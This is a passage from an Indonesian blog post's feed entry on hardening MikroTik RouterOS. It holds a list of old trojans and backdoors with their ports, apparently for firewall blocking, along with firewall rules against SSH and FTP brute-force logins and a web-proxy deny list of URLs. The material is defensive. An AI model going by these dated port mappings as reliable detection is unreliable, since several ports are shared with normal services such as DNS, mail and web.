TCP&lt;br /&gt;Deep Throat v3 6674 TCP&lt;br /&gt;DeepBO 31337 UDP&lt;br /&gt;DeepThroat 999 TCP&lt;br /&gt;Delta Source 26274 UDP&lt;br /&gt;Delta Source 47262 UDP&lt;br /&gt;Der Spacher 3 1000/1001/2000/2001 TCP&lt;br /&gt;Devil 65000 TCP&lt;br /&gt;Digital RootBeer 2600 TCP&lt;br /&gt;DMsetup 58/59 TCP&lt;br /&gt;DNS 53 TCP&lt;br /&gt;Doly Trojan 21/1010-1012/1015 TCP&lt;br /&gt;Donald Dick 23476/23477 TCP&lt;br /&gt;DRAT 48/50 TCP&lt;br /&gt;DUN Control 12623 UDP&lt;br /&gt;Eclipse 2000 3459 TCP&lt;br /&gt;Eclypse 3801 UDP&lt;br /&gt;Email Password Sender 25 TCP&lt;br /&gt;Evil FTP 23456 TCP&lt;br /&gt;Executer 80 TCP&lt;br /&gt;File Nail 4567 TCP&lt;br /&gt;Firehotcker 79/5321 TCP&lt;br /&gt;Fore 21/50766 TCP&lt;br /&gt;FTP - Trojan 21 TCP&lt;br /&gt;FTP99cmp 1492 TCP&lt;br /&gt;Gaban Bus 12345/12346 TCP&lt;br /&gt;Gate Crasher 6969/6970 TCP&lt;br /&gt;GirlFriend 21554 TCP&lt;br /&gt;Gjamer 12076 TCP&lt;br /&gt;Hack '99 KeyLogger 12223 TCP&lt;br /&gt;Hack 'a' Tack 31780/31785/31787-31789 TCP&lt;br /&gt;Hack 'a' Tack 31791/31792 UDP&lt;br /&gt;HackCity Ripper Pro 2023 TCP&lt;br /&gt;Hackers Paradise 31/456 TCP&lt;br /&gt;HackOffice 8897 TCP&lt;br /&gt;Haebu Coceda 25 TCP&lt;br /&gt;Happy 99 25/119 TCP&lt;br /&gt;Hidden Port 99 TCP&lt;br /&gt;Hooker 80 TCP&lt;br /&gt;Host Control 6669/11050 TCP&lt;br /&gt;HVL Rat5 2283 TCP&lt;br /&gt;icKiller 7789 TCP&lt;br /&gt;ICQ (ICQ.com - community, people search and messaging service!) 1027/1029/1032 TCP&lt;br /&gt;ICQ Revenge 16772/19864 TCP&lt;br /&gt;ICQ Trojan 4590 TCP&lt;br /&gt;Illusion Mailer 2155/5512 TCP&lt;br /&gt;InCommand 9400 TCP&lt;br /&gt;Indoctrination 6939 TCP&lt;br /&gt;Infector 146 TCP&lt;br /&gt;Infector 146 UDP&lt;br /&gt;iNi-Killer 555/9989 TCP&lt;br /&gt;Insane Network 2000 TCP&lt;br /&gt;Invisible FTP 21 TCP&lt;br /&gt;IRC-3 6969 TCP&lt;br /&gt;JammerKillah 121 TCP&lt;br /&gt;Kazimas 113/7000 TCP&lt;br /&gt;Kuang2 25/17300/30999 TCP&lt;br /&gt;Larva 21 TCP&lt;br /&gt;Logged 20203 TCP&lt;br /&gt;Masters' Paradise 31/3129/40421-40423/40425-40426 TCP&lt;br /&gt;Mavericks Matrix 1269 TCP&lt;br /&gt;Millenium 20000-20001 TCP&lt;br /&gt;MiniCommand 1050 TCP&lt;br /&gt;Mosucker 16484 TCP&lt;br /&gt;Nephron 17777 TCP&lt;br /&gt;Net Administrator 21/555 TCP&lt;br /&gt;Net Controller 123 TCP&lt;br /&gt;Netbios datagram (DoS Attack) 138 TCP&lt;br /&gt;Netbios name (DoS Attack) 137 TCP&lt;br /&gt;Netbios session (DoS Attack) 139 TCP&lt;br /&gt;NetBus 12345-12346 TCP&lt;br /&gt;NetBus Pro 20034 TCP&lt;br /&gt;NetMetropolitan 5031 TCP&lt;br /&gt;NetMonitor 7300-7301/7306-7308 TCP&lt;br /&gt;NetRaider 57341 TCP&lt;br /&gt;NETrojan 1313 TCP&lt;br /&gt;NetSphere 30100-30103 TCP&lt;br /&gt;NetSpy 1024/1033/31338-31339 TCP&lt;br /&gt;NewApt 25 TCP&lt;br /&gt;NoBackO 1200-1201 UDP&lt;br /&gt;One of the Last Trojan (OOTLT) 5011 TCP&lt;br /&gt;OpC BO 1969 TCP&lt;br /&gt;PC Crasher 5637-5638 TCP&lt;br /&gt;Phase Zero 555 TCP&lt;br /&gt;Phineas Phucker 2801 TCP&lt;br /&gt;Pie Bill Gates 12345 TCP&lt;br /&gt;Portal of Doom 3700/9872-9875 TCP&lt;br /&gt;Portal of Doom 10067/10167 UDP&lt;br /&gt;Priority 6969/16969 TCP&lt;br /&gt;Progenic 11223 TCP&lt;br /&gt;ProMail Trojan 25/110 TCP&lt;br /&gt;Prosiak 22222/33333 TCP&lt;br /&gt;Psyber Stream Server 1024/1170/1509/4000 TCP&lt;br /&gt;Rasmin 531/1045 TCP&lt;br /&gt;RAT 1095/1097-1099/2989 TCP&lt;br /&gt;RC 65535 TCP&lt;br /&gt;Rcon 8989 TCP&lt;br /&gt;Remote Grab 7000 TCP&lt;br /&gt;Remote Windows Shutdown 53001 TCP&lt;br /&gt;RingZero 80/3128/8080 TCP&lt;br /&gt;Robo-Hack 5569 TCP&lt;br /&gt;Satanz backDoor 666 TCP&lt;br /&gt;ScheduleAgent 6667 TCP&lt;br /&gt;School Bus 54321 TCP&lt;br /&gt;Schwindler 21554/50766 TCP&lt;br /&gt;Secret Agent 11223 TCP&lt;br /&gt;Secret Service 605/6272 TCP&lt;br /&gt;Senna Spy FTP Server 21/11000/13000 TCP&lt;br /&gt;ServeMe 5555 TCP&lt;br /&gt;ServeU 666 TCP&lt;br /&gt;Shadow Phyre 666 TCP&lt;br /&gt;Shit Heep 6912 TCP&lt;br /&gt;ShockRave 1981 TCP&lt;br /&gt;Shtirlitz 25 TCP&lt;br /&gt;Sivka-Burka 1600 TCP&lt;br /&gt;SK Silencer 1001 TCP&lt;br /&gt;Socket25 30303 TCP&lt;br /&gt;Sockets de Troie 5000-5001/30303/50505 TCP&lt;br /&gt;SoftWAR 1207 TCP&lt;br /&gt;Spirit 2001a 33911 TCP&lt;br /&gt;SpySender 1807 TCP&lt;br /&gt;Stealth 25 TCP&lt;br /&gt;Stealth Spy 555 TCP&lt;br /&gt;Streaming Audio trojan 1170 TCP&lt;br /&gt;Striker 2565 TCP&lt;br /&gt;SubSeven 1243/2773/6711-6713/6776/7000/7215&lt;br /&gt;/27374/27573/54283 TCP&lt;br /&gt;SubSeven Apocalypse 1243 TCP&lt;br /&gt;Syphillis 10086 TCP&lt;br /&gt;Tapiras 25 TCP&lt;br /&gt;TCP Wrappers 421 TCP&lt;br /&gt;TeleCommando 61466 TCP&lt;br /&gt;Terminator 25 TCP&lt;br /&gt;Terror Trojan 3456 TCP&lt;br /&gt;The Invasor 2140/3150 TCP&lt;br /&gt;The Prayer 2716/9999 TCP&lt;br /&gt;The Spy 40412 TCP&lt;br /&gt;The Thing 6000/6400 TCP&lt;br /&gt;The Traitor 65432 TCP&lt;br /&gt;The Traitor 65432 UDP&lt;br /&gt;The Trojan Cow 2001 TCP&lt;br /&gt;The Unexplained 29891 UDP&lt;br /&gt;Tiny Telnet Server 23/34324 TCP&lt;br /&gt;TransScout 1999-2005/9878 TCP&lt;br /&gt;Trinoo 34555/35555 UDP&lt;br /&gt;Truva Atl 23 TCP&lt;br /&gt;Ugly FTP 23456 TCP&lt;br /&gt;Ultor's Trojan 1234 TCP&lt;br /&gt;Vampire 1020 TCP&lt;br /&gt;Vampyre 6669 TCP&lt;br /&gt;Virtual Hacking Machine 4242 TCP&lt;br /&gt;Voice 1024/1170/4000 TCP&lt;br /&gt;Voodoo Doll 1245 TCP&lt;br /&gt;Wack-a-mole 12361-12362 TCP&lt;br /&gt;Web Ex 21/1001 TCP&lt;br /&gt;WhackJob 12631/23456 TCP&lt;br /&gt;WinCrash 21/2583/3024/4092/5714/5741-5742 TCP&lt;br /&gt;WinGate (socks-proxy) 1080 TCP&lt;br /&gt;WinHole 1080/1082 TCP&lt;br /&gt;WinNuke 135/139 TCP&lt;br /&gt;WinPC 25 TCP&lt;br /&gt;WinSatan 999 TCP&lt;br /&gt;WinSpy 25 TCP&lt;br /&gt;X-bill 12345-12346 TCP&lt;br /&gt;Xplorer 2300 TCP&lt;br /&gt;Xtcp 5550 TCP&lt;br /&gt;Xtreme 1090 TCP&lt;br /&gt;YAT 37651&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;########## Pembatasan Brute Force  #################################&lt;br /&gt;/ ip firewall filter&lt;br /&gt;add chain=input protocol=tcp dst-port=22 connection-limit=1,32 \&lt;br /&gt;  action=add-src-to-address-list address-list=ssh_logins \&lt;br /&gt;  address-list-timeout=2m comment="" disabled=no&lt;br /&gt;add chain=input protocol=tcp dst-port=22 src-address-list=!ssh_logins \&lt;br /&gt;  action=accept comment="" disabled=no&lt;br /&gt;add chain=forward src-address=192.168.1.10 protocol=tcp src-port=21 \&lt;br /&gt;  content="password incorrect" action=add-dst-to-address-list \&lt;br /&gt;  address-list=ftp_logins address-list-timeout=1m comment="" disabled=no&lt;br /&gt;add chain=forward src-address-list=ftp_logins action=drop comment="" disabled=no&lt;br /&gt;########################################################################&lt;br /&gt;&lt;br /&gt;Pemblokiran beberapa URL tertentu dapat dilakukan pada mikrotik.&lt;br /&gt;Jika paket web-proxy telah terinstall dan web-proxynya juga telah&lt;br /&gt;dikonfigurasi, maka perintah dibawah ini dapat disertakan.&lt;br /&gt;&lt;br /&gt;Update terus URL dibawah ini, sesuai dengan kebutuhan Anda.&lt;br /&gt;&lt;br /&gt;### Blok URL Tertentu untuk Web Proxy Access list.&lt;br /&gt;  Cari Sendiri URL yang akan diblok ######&lt;br /&gt;&lt;br /&gt;/ip web-proxy access \&lt;br /&gt;add url="ds.eyeblaster.com" action=deny comment="" disabled=no&lt;br /&gt;add url="duolaimi.net" action=deny comment="" disabled=no&lt;br /&gt;add url="dutch-sex.com" action=deny comment="" disabled=no&lt;br /&gt;add url="dvdbank.org" action=deny comment="" disabled=no&lt;br /&gt;add url="eager-sex.com" action=deny comment="" disabled=no&lt;br /&gt;add url="eases.net" action=deny comment="" disabled=no&lt;br /&gt;add url="easyantispy.com" action=deny comment="" disabled=no&lt;br /&gt;add url="easycategories.com" action=deny comment="" disabled=no&lt;br /&gt;add url="easy-search.net" action=deny comment="" disabled=no&lt;br /&gt;add url="ecosrioplatenses.org" action=deny comment="" disabled=no&lt;br /&gt;add url="ecstasyporn.net" action=deny comment="" disabled=no&lt;br /&gt;add url="ehg-bestbuy.hitbox.com" action=deny comment="" disabled=no&lt;br /&gt;add url="ehg-dig.hitbox.com" action=deny comment="" disabled=no&lt;br /&gt;add url="ehg-espn.hitbox.com" action=deny comment="" disabled=no&lt;br /&gt;add url="ehg-intel.hitbox.com" action=deny comment="" disabled=no&lt;br /&gt;add url="ehg-macromedia.hitbox.com" action=deny comment="" disabled=no&lt;br /&gt;&lt;br /&gt;################################################################&lt;br /&gt;&lt;br /&gt;&lt;/rotor@kecoak-elektronik.net&gt;&lt;/span&gt;&lt;/address&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2588755122724100110-1982925339333467280?l=siswaplus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2588755122724100110/posts/default/1982925339333467280'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2588755122724100110/posts/default/1982925339333467280'/><link rel='alternate' type='text/html' href='http://siswaplus.blogspot.com/2007/06/instalasi-konfigurasi-dan-optimasi.html' title='Instalasi, Konfigurasi dan Optimasi Mikrotik RouterOS'/><author><name>SISWA+ Team</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry></feed>
